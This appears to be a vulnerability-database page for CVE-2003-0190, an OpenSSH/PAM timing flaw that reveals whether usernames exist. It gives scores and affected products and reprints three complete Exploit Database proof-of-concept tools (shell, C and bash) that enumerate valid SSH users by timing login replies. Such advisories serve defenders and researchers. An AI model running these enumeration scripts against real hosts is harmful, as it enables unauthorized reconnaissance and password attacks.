English
Français
Light
Dark
System

Alert System

Stay informed at all times
Create an account Open a free account Login Manage your alerts

CVE-2003-0190 : Detail

CVE-2003-0190

6.86%V3
Network
2003-05-01 22:00 +00:00
2022-12-12 23:00 +00:00
CVE.org
NVD

Alert for a CVE

Stay informed of any changes for a specific CVE.
Alert management

Descriptions

OpenSSH-portable (OpenSSH) 3.6.1p1 and earlier with PAM support enabled immediately sends an error message when a user does not exist, which allows remote attackers to determine valid usernames via a timing attack.

Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-203 Observable Discrepancy
The product behaves differently or sends different responses under different circumstances in a way that is observable to an unauthorized actor, which exposes security-relevant information about the state of the product, such as whether a particular operation was successful or not.

Metrics

Metric Score Severity CVSS Vector Source
V2 5 AV:N/AC:L/Au:N/C:P/I:N/A:N [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 26

Publication date : 2003-05-01 22:00 +00:00
Author : Nicolas Couture
EDB Verified : Yes

#!/bin/sh # OpenSSH <= 3.6.p1 - User Identification. # Nicolas Couture - [email protected] # # Description: # -Tells you wether or not a user exist on # a distant server running OpenSSH. # # Usage: # -You NEED to have the host's public key # before executing this script. # #=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-# # Fact Sheet: # # o It is really accurate against # # redhat boxes. # # o Linux boxes running grsecurity # # has 10 seconds delay on both # # valid AND invalid user login # # attempts. # # o *BSD boxes are not vulnerables and # # always has 10 seconds delay like # # Linux-Grsec + network protection # # # #=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-# #=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=# # History: # Thu May 1 15:41:18 EDT 2003 # ; Script started. # Thu May 1 16:42:30 EDT 2003 # ; Script is functional. #=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=# # Let the user know how we work. usage(){ echo "$0 <user> <host>" exit 1 } # Verify the arguments. [ $# != 2 ] && usage # Variables. USER="$1" HOST="$2" #=-=-=-=-=-=-=-=-=-=-=-=-=# # Expect script functions # #=-=-=-=-=-=-=-=-=-=-=-=-=# # Expect script for password. expasswd() { cat << EOF > expasswd spawn $SSHCMD expect password: send '\r' interact EOF } # Expect script for error. experror() { cat << EOF > experror spawn expect -f expasswd expect again. exit 1593 interact EOF } #=-=-=-=-=-=-=-=-=-=# # -Fake user timing # #=-=-=-=-=-=-=-=-=-=# # OpenSSH client command for inexisting user. export SSHCMD="ssh nicolas_couture@$HOST" # Build new expect script. expasswd experror # Timing. FDATE0=`date '+%s'` echo "[-] Calculating fake user timeout..." expect -f experror 1> /dev/null 2> /dev/null FDATE1=`date '+%s'` # Fake user timeout. FUTO=`echo $FDATE1 - $FDATE0 | bc` echo "[+] Found $FUTO." #=-=-=-=-=-=-=-=# # -$USER timing # #=-=-=-=-=-=-=-=# # OpenSSH command. export SSHCMD="ssh $USER@$HOST" # Build new expect scripts. expasswd experror DATE0=`date '+%s'` echo "[-] Calculating $USER timeout on $SERVER..." expect -f experror 1> /dev/null 2> /dev/null DATE1=`date '+%s'` # $USER timeout. END=`echo $DATE1 - $DATE0 | bc` echo "[+] Found $END." #=-=-=-=-=# # -Result # #=-=-=-=-=# if [ "$FUTO" -eq "$END" ] && [ "$FUTO" -eq "10" ]; then echo "This box is not vulnerable." exit 1 fi # Use of our magic skills. if [ "$FUTO" -lt "$END" ]; then echo "$USER exist on $HOST." elif [ "$FUTO" -ge "$END" ]; then echo "$USER doesn't exist on $HOST." else echo "Segmentation fault." exit 13 fi # Remove tmp files. rm -rf expasswd experror # EOF # milw0rm.com [2003-05-02]
Exploit Database EDB-ID : 25

Publication date : 2003-04-29 22:00 +00:00
Author : Maurizio Agazzini
EDB Verified : Yes

/* * SSH_BRUTE - OpenSSH/PAM <= 3.6.1p1 remote users discovery tool * Copyright (c) 2003 @ Mediaservice.net Srl. All rights reserved * * * Vulnerability discovered by Marco Ivaldi <[email protected]> * Proof of concept code by Maurizio Agazzini <[email protected]> * * Tested against Red Hat, Mandrake, and Debian GNU/Linux. * * Reference: http://lab.mediaservice.net/advisory/2003-01-openssh.txt * * $ tar xvfz openssh-3.6.1p1.tar.gz * $ patch -p0 <openssh-3.6.1p1_brute.diff * patching file openssh-3.6.1p1/ssh.c * patching file openssh-3.6.1p1/sshconnect.c * patching file openssh-3.6.1p1/sshconnect1.c * patching file openssh-3.6.1p1/sshconnect2.c * $ cd openssh-3.6.1p1 * $ ./configure * $ make * $ cc ../ssh_brute.c -o ssh_brute * $ ./ssh_brute 1 list.txt 192.168.0.66 */ #include <stdio.h> #include <stdlib.h> #include <sys/wait.h> /* an illegal user */ #define NO_USER "not_val_user" /* path of the patched ssh */ #define PATH_SSH "./ssh" /* max time range for invalid user */ #define TIME_RANGE 3 int main(int argc, char *argv[]) { FILE * in; char buffer[2000], username[100], *host; int time_non_valid = 0, time_user = 0; int version = 1, i = 0, ret; fprintf(stderr, "\n SSH_BRUTE - OpenSSH/PAM <= 3.6.1p1 remote users discovery tool\n"); fprintf(stderr, " Copyright (c) 2003 @ Mediaservice.net Srl. All rights reserved\n"); if (argc < 3) { fprintf(stderr, "\n Usage: %s <protocol version> <user file> <host>\n\n", argv[0]); exit(-1); } version = atoi(argv[1]); host = argv[3]; if ( ( in = fopen(argv[2], "r") ) == NULL ) { fprintf(stderr, "\n Can't open %s\n", argv[2]); exit(-1); } /* test an illegal user */ printf("\n Testing an illegal user\t: "); fflush(stdout); sprintf(buffer, "%s -%d %s@%s", PATH_SSH, version, NO_USER, host); for (i = 0; i < 3; i++) { ret = system(buffer); time_non_valid += WEXITSTATUS(ret); } time_non_valid /= 3; printf("%d second(s)\n\n", time_non_valid); time_non_valid += TIME_RANGE; /* test supplied users */ fscanf(in, "%s", username); while ( !feof(in) ) { printf(" Testing login %s\t", username); if (strlen(username) <= 8) printf("\t"); printf(": "); fflush( stdout ); sprintf(buffer, "%s -%d %s@%s", PATH_SSH, version, username, host); ret = system(buffer); time_user = WEXITSTATUS(ret); if (time_user <= time_non_valid) printf("\E[31m\E[1mILLEGAL\E[m\t[%d second(s)]\n", time_user); else { /* valid user? test it again to be sure */ ret = system(buffer); time_user = WEXITSTATUS(ret); if (time_user <= time_non_valid) printf("\E[31m\E[1mILLEGAL\E[m\t[%d second(s)] [2 test]\n", time_user); else printf("\E[32m\E[1mUSER OK\E[m\t[%d second(s)]\n", time_user); } fscanf(in, "%s", username); } fclose(in); printf("\n"); exit(0); } // milw0rm.com [2003-04-30]
Exploit Database EDB-ID : 3303

Publication date : 2007-02-12 23:00 +00:00
Author : Marco Ivaldi
EDB Verified : Yes

#!/bin/bash # # $Id: raptor_sshtime,v 1.1 2007/02/13 16:38:57 raptor Exp $ # # raptor_sshtime - [Open]SSH remote timing attack exploit # Copyright (c) 2006 Marco Ivaldi <[email protected]> # # OpenSSH-portable 3.6.1p1 and earlier with PAM support enabled immediately # sends an error message when a user does not exist, which allows remote # attackers to determine valid usernames via a timing attack (CVE-2003-0190). # # OpenSSH portable 4.1 on SUSE Linux, and possibly other platforms and versions, # and possibly under limited configurations, allows remote attackers to # determine valid usernames via timing discrepancies in which responses take # longer for valid usernames than invalid ones, as demonstrated by sshtime. # NOTE: as of 20061014, it appears that this issue is dependent on the use of # manually-set passwords that causes delays when processing /etc/shadow due to # an increased number of rounds (CVE-2006-5229). # # This is a simple shell script based on expect meant to remotely analyze # timing differences in sshd "Permission denied" replies. Depending on OpenSSH # version and configuration, it may lead to disclosure of valid usernames. # # Usage example: # [make sure the target hostkey has been approved before] # ./sshtime 192.168.0.1 dict.txt # # Some vars port=22 # Command line host=$1 dict=$2 # Local functions function head() { echo "" echo "raptor_sshtime - [Open]SSH remote timing attack exploit" echo "Copyright (c) 2006 Marco Ivaldi <[email protected]>" echo "" } function foot() { echo "" exit 0 } function usage() { head echo "[make sure the target hostkey has been approved before]" echo "" echo "usage : ./sshtime <target> <wordlist>" echo "example: ./sshtime 192.168.0.1 dict.txt" foot } function notfound() { head echo "error : expect interpreter not found!" foot } # Check if expect is there expect=`which expect 2>/dev/null` if [ $? -ne 0 ]; then notfound fi # Input control if [ -z "$2" ]; then usage fi # Perform the bruteforce attack head for user in `cat $dict` do echo -ne "$user@$host\t\t" (time -p $expect -c "log_user 0; spawn -noecho ssh -p $port $host -l $user; for {} 1 {} {expect -nocase \"password*\" {send \"dummy\r\"} eof {exit}}") 2>&1 | grep real done foot # milw0rm.com [2007-02-13]

Products Mentioned

Configuraton 0

Openbsd>>Openssh >> Version To (excluding) 3.6.1

Openbsd>>Openssh >> Version 3.6.1

Configuraton 0

Openpkg>>Openpkg >> Version 1.2

Openpkg>>Openpkg >> Version 1.3

Configuraton 0

Siemens>>Scalance_x204rna_ecc_firmware >> Version To (excluding) 3.2.7

Siemens>>Scalance_x204rna_ecc >> Version -

Configuraton 0

Siemens>>Scalance_x204rna_firmware >> Version To (excluding) 3.2.7

Siemens>>Scalance_x204rna >> Version -

References